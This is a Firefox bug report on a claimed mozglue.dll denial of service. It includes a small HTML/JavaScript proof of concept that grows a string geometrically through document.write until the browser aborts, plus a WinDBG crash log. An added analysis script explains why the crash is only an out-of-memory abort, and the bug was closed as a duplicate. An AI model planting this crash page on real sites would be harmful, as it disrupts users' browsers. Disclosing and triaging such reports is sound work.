Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability

RESOLVED DUPLICATE of bug 380223

Status
Product: Firefox
Component: Untriaged
RESOLVED DUPLICATE of bug 380223
Reported: a year ago
Last modified: a year ago

People

(Reporter: Benjamin Kunz Mejri, Unassigned)

Tracking

Version: 48 Branch
Points: ---

Firefox Tracking Flags

(Not tracked)

Details

Description (Reporter, a year ago)
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160823121617

Steps to reproduce:

PoC:
<body onload="javascript:VulnerabilityLab();"></body>

<script>
function VulnerabilityLab() {
  // Each pass doubles the string and appends one more character, so its
  // length after n passes is 2^(n+1) - 1; the loop never gets near 1337 passes
  // before the allocator gives up.
  var buffer = '\x41';
  for (var i = 0; i < 1337; i++) {
    buffer += buffer + '\x41';
    // Write the (unclosed) marquee and heading containing the string twice
    document.write('<html><marquee><h1>' + buffer + buffer);
  }
}
</script>


--- Debug Session Logs [WinDBG] ---
Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\mozglue.dll - 
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
6e82efe6 6a03            push    3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50              push    eax
6e82eff9 ff155c60836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc              int     3
mozglue!mozalloc_handle_oom:
6e82f000 55              push    ebp
lmvm mozglue
start    end        module name
6e820000 6e83d000   mozglue    (export symbols)       C:\Program Files\Mozilla Firefox\mozglue.dll
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\mozglue.dll
    Image path: C:\Program Files\Mozilla Firefox\mozglue.dll
    Image name: mozglue.dll
    Timestamp:        Wed Aug 24 06:53:43 2016 (57BD2857)
    CheckSum:         0001E87D
    ImageSize:        0001D000
    File version:     48.0.2.6079
    Product version:  48.0.2.6079
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: mozglue.dll
    ProductVersion:   48.0.2
    FileVersion:      48.0.2
    FileDescription:  48.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla


Actual results:

Opening the PoC code as HTML allows remote attackers to crash the Mozilla Firefox browser and Firefox OS via mozglue.dll.


Expected results:

The script loop exception should capture the process to protect against uncaught exceptions, bofs or other read/write access violations.
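
The loop in the PoC doubles `buffer` on every pass, and the debug session stops at an `int 3` inside mozglue!mozalloc_abort with mozalloc_handle_oom directly adjacent in the disassembly, which is the allocation-failure path rather than a memory-corruption one. The script below is an added illustration, not part of the report or of Firefox; it models the growth of the string to show how quickly it outruns any plausible allocation limit. The character limit and bytes-per-character figures it uses are assumptions for demonstration, not measured Firefox values.

```javascript
// Added example (not from the bug report): model the growth of the PoC's
// `buffer += buffer + '\x41'` loop. All values are computed, not measured.

// Length of `buffer` after `iterations` passes of the loop body. The string
// starts at length 1 ('\x41'); each pass doubles it and appends one
// character, so len_n = 2 * len_{n-1} + 1 = 2^(n+1) - 1. BigInt keeps the
// arithmetic exact well past the point where Number would overflow.
function bufferLengthAfter(iterations) {
  let len = 1n;
  for (let i = 0; i < iterations; i++) {
    len = 2n * len + 1n;
  }
  return len;
}

// Closed form of the same recurrence, used to cross-check the loop.
function bufferLengthClosedForm(iterations) {
  return (1n << (BigInt(iterations) + 1n)) - 1n;
}

// First loop index i (0-based, as in the PoC's `for (i = 0; ...)`) whose pass
// produces a string longer than `maxChars`. Returns -1 if no pass does.
function firstIterationExceeding(maxChars, totalIterations = 1337) {
  const limit = BigInt(maxChars);
  let len = 1n;
  for (let i = 0; i < totalIterations; i++) {
    len = 2n * len + 1n; // buffer after this pass
    if (len > limit) return i;
  }
  return -1;
}

// Rough size of what one document.write call hands the parser at pass i: the
// fragment contains `buffer` twice. `bytesPerChar` is an assumption (2 for
// UTF-16 storage); engine overhead and the markup prefix are ignored.
function bytesWrittenAtIteration(i, bytesPerChar = 2) {
  return 2n * bufferLengthAfter(i + 1) * BigInt(bytesPerChar);
}

// Stand-alone run with an assumed (hypothetical) cap of 2^28 - 1 characters
// per string, to show the loop dies around pass 27, not pass 1337.
const ASSUMED_MAX_CHARS = 2 ** 28 - 1;
const failingPass = firstIterationExceeding(ASSUMED_MAX_CHARS);
console.log(`assumed string cap ${ASSUMED_MAX_CHARS} chars exceeded at pass ${failingPass}`);
console.log(`document.write at that pass would carry ~${bytesWrittenAtIteration(failingPass)} bytes`);
```

Run it with `node`. The point for triage is that a script whose allocations grow geometrically until the allocator fails is an out-of-memory abort by design, which is why the report was resolved as a duplicate rather than as a memory-safety issue.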

Updated (a year ago)
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: a year ago
Resolution: --- → DUPLICATE
Duplicate of bug: 380223